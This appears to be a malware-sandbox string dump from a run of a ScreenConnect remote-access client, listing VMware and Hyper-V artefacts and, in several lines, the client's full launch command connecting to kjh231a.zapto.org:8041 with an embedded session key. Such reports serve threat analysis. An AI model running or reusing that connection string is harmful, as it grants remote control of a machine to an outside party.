Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXMLR_qx
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw/GXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ+dGeg/cuTe0Hgq7TG8W0lgWTvrMRkGNR+Uk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx+hJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS/8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0+2hq5N/YBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm+ksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z/b99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd/tni/TbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq/qw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz+s7k76sCavOBFusk7B9/er+6fuzXJGdHn+0nrha9T95dI9YwA9AMFbz76jd/nrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi+6Dda6yhq/yXOd8T+y41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv/8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy/kzjr6AfBe/dg45Om2pU6B4DxLn/v/qwYed548Qj6TB6o0COi24fHizlGPc+cfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2+8Rj3DMXov8JNlZcQvcyWugYXdt0c/YRBjsTKtGBCM06rpYs2BXcY3gBPle/Mcm/phZipIpXAsqVaA8FC2fe5frvFojbT7Fr/KsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z/Tq3IpdBotASVtA/y93iotYmUFJ2Pqq2HhMyG/SCBRUHcW4EUd393OAIuLy4ofjR+0Pe+khd/GnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi+LGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47+Soo6ne3zAVNteDJnfv7IAwbSwOB+B1ODuP31NWONE+THgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k+kRTOkAesVozYVKbs1/aCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8//hXM1dH/aXcBM7n0AAAACz8BeRgb/OBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m/VIse9uv1s4dpHi+XM
Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1790695435.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2f`,_q
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: `,_qExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXM&r=&i=Untitled%2520Session"LR_q
Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: svchost.exe, 00000008.00000002.2608059765.000001CEA28D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXT+SQlVMWare
Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Y7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBjsTKtGBCM06rpYs2BXcY3gBPle%2fMcm%2fphZipIpXAsqVaA8FC2fe5frvFojbT7Fr%2fKsUXp6brNP65sBjrp5CEELNTP71wQJR8e4QW7POdg2sPW2duEDagVur8Z%2fTq3IpdBotASVtA%2fy93iotYmUFJ2Pqq2HhMyG%2fSCBRUHcW4EUd393OAIuLy4ofjR%2b0Pe%2bkhd%2fGnueYhyuAVOjWMjPLxX4jpjkef5gJMjB8I00geWxeOSi%2bLGb42tVUwaibLbLLKKTNOsg8XZdUEP5NhZgIWlFytQ4uIyXwpcXYYpYKTaLR1V6kY2VuTXMcBqvmadraa3uqXqemUkhsF5ZQbREd47%2bSoo6ne3zAVNteDJnfv7IAwbSwOB%2bB1ODuP31NWONE%2bTHgMHQNtGxaf1JEIZsPsd8MwtR4J11oD7kE5asaRj4s1W21pi5CUpRXO87k%2bkRTOkAesVozYVKbs1%2faCV6RXLb69M9YMHxNHsKElL0UrEYr50aw5exOuW8%2f%2fhXM1dH%2faXcBM7n0AAAACz8BeRgb%2fOBzs7iBHxh2WBDwOYoDUImIyOSubXC8JfgkRG2dsngc9c1uFkbPP9rh7T8m%2fVIse9uv1s4dpHi%2bXMt-_q
Source: svchost.exe, 00000007.00000002.2608211921.0000025CF242B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: ScreenConnect.ClientService.exe, 0000000C.00000002.1791698285.0000000001201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=ae095c23-8e22-4747-b9a0-c8c8b34ba57d&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAqHcYWWhYxk2TTZ0IUUwtAgAAAAACAAAAAAAQZgAAAAEAACAAAAA8RpQg4oVFt9XPJUqpRcLW3DIrmMd0AaOuiVw%2fGXINGgAAAAAOgAAAAAIAACAAAACCdOZgHqpMcodqURrATYqRaZ4JQtghWNz8cMf6Hht5OaAEAADkPzZ5KvtcppXqUipZJdeh0dLZKHX8xGwn55uGAFs3AvjhhrIcVvhoZdVrWG8EwKBPp3RQ%2bdGeg%2fcuTe0Hgq7TG8W0lgWTvrMRkGNR%2bUk2SQeBVYOuLlSGV1nqSHvAI6FNozpNsPfRWTNYbOqmqSXg9i60jlJrMYXulGpJblT3x1F2BFUhsn3DLm1J87nUrkBx%2bhJHRl0q4uYV2WTaCEGX4f9COqXCkBPMr9Jvr2yHYT48hoDtAY54Ue2PS%2f8e9hNYkjAiYY7dA9B5rdqaYikmhJEFlf0%2b2hq5N%2fYBnoRL8ZUJKaCpoGMX7xbyLKBpU1hDpPgV5boa2Ph8nXgxqOYU1CHbYcHatfrGy3LOwcVkM9yP3awjcm%2bksXISEhgBOZpm6uObIeQZtRuea2IPlZyZqqfuPciCcj4Z%2fb99T0T9qhzCCN4g6kostExDRqpg0RVP3BwUhh7yerLoJgd%2ftni%2fTbVUED66WGCbeKfS7VZTSUsdmg7EwOa9gElUHjNYksS2QNWQWVBadhHIPj9ppLdv6Jl2m8Efemrrcv4UJcJoHUYQq%2fqw0jEx2qEtsj1A0i4UpbRkrf1HzVKOf2U1rQFkBEgTSTnldv3zyCmNxfSz3tK3Qfyp2mzxRDVnvDeEtzwfZZALz%2bs7k76sCavOBFusk7B9%2fer%2b6fuzXJGdHn%2b0nrha9T95dI9YwA9AMFbz76jd%2fnrrIVqAUpJEfY1sfQLULMYXjFOaVvmtukTmBbLY1sYXIaR6zrTdwBLDRVc3bY2ShCuTOH5PQHQIapWygT37GTq68oi%2b6Dda6yhq%2fyXOd8T%2by41IeuOwRDyuJMPpfBQTsAJ0827u9dksK7UBhB2AXvyezcpuiTv%2f8zRvkRagmbBiK9pe9dAbbpaBMRD8pAdotjVDW5fJ9sfV2nHnHLJ9sDPBGTEy%2fkzjr6AfBe%2fdg45Om2pU6B4DxLn%2fv%2fqwYed548Qj6TB6o0COi24fHizlGPc%2bcfR0SbTgLl4avKsNur7DydrHV1HQTm7ZaTZx14iJQ2%2b8Rj3DMXov8JNlZcQvcyWugYXdt0c%2fYRBj